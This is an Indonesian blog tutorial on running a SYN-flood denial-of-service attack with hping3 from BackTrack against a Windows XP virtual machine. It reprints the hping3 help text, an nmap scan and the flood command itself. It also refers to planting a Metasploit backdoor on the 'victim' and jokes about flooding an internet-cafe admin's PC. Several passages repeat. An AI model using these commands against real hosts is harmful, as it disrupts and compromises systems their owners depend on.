sharing again
tutorial ini di buat oleh saudara saya xsan-lanci tentang dos menggunakan hping3
cara melakukan dos atau Denial Of Service dengan menggunakan
hping3,secara default hping3 sudah ada di dlm tools backtrack 5R2
posisinya ada di
Application > Backtrack > Stress Testing > Network Stress Testing > hping3
okeh peralatan tempur ane yaitu
virtualbox
backtrack 5R2
Hping3
Metasploit
Target saya
windows xp yg katanya proffesional wakakak dengan RAM 1 gb
processor intel core 2 duo
VGA nvdia GEFORCE (ga tau seri apaan)
ok langsung aja deh buka msfconsole
terus bikin backdoor untuk di tanam di PC korban caranya lengkap ada di http://forum.indonesianbacktrack.or.id/
ane anggap backdoor udah di execution alias di jalanin ama korban oke
next kita ping ke ip korban kl ngereplay berarti semua lancar kaya gini
Application > Backtrack > Stress Testing > Network Stress Testing > hping3
okeh peralatan tempur ane yaitu
virtualbox
backtrack 5R2
Hping3
Metasploit
Target saya
windows xp yg katanya proffesional wakakak dengan RAM 1 gb
processor intel core 2 duo
VGA nvdia GEFORCE (ga tau seri apaan)
ok langsung aja deh buka msfconsole
terus bikin backdoor untuk di tanam di PC korban caranya lengkap ada di http://forum.indonesianbacktrack.or.id/
ane anggap backdoor udah di execution alias di jalanin ama korban oke
next kita ping ke ip korban kl ngereplay berarti semua lancar kaya gini
langsung buka console lagi deh ketik hping3 -h
okeh pertama cb di nmap dl broxsan-lahci@ibt:~# hping3 -h
usage: hping host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set dont fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)
okeh kl udh cb di jalanin deh hping3 kaya ginixsan-lahci@ibt:~# nmap -sV 192.168.1.101
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-08-04 13:40 WIT
Nmap scan report for 192.168.1.101
Host is up (0.00072s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:F8:D5:8B (Cadmus Computer Systems)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.96 seconds
xsan-lahci@ibt:~# hping3 -i u100 -S -p 443 192.168.1.101
keterangan
-i (-- interval ) = dalam satuan mikrodetik
-S ( --SYN mode ) = mengeset flag SYN
-p = port target
ip target = 192.168.1.101
ini adalah efek dr serangan menggunakan hping3 td
jangan lama-lama kesian hehe ketika saya tekan ctrl+c atau menghentikan serangan usage PC korban menjadi normal lg
note:
coba anda bayangkan jika 3 komputer menyerang 1 PC admin di warnet pasti anda dosa hahaha tread ini saya buat hanya untuk pembelajaran saja
okeh segitu dl yah silahkan di explore lagi cara penggunakan hping3 dan tools yg lainnya
pesan singkat terakhir jangan pernah melakukan stress testing jika belum melakukan information gathering
coba anda bayangkan jika 3 komputer menyerang 1 PC admin di warnet pasti anda dosa hahaha tread ini saya buat hanya untuk pembelajaran saja
okeh segitu dl yah silahkan di explore lagi cara penggunakan hping3 dan tools yg lainnya
pesan singkat terakhir jangan pernah melakukan stress testing jika belum melakukan information gathering
0 komentar:
Posting Komentar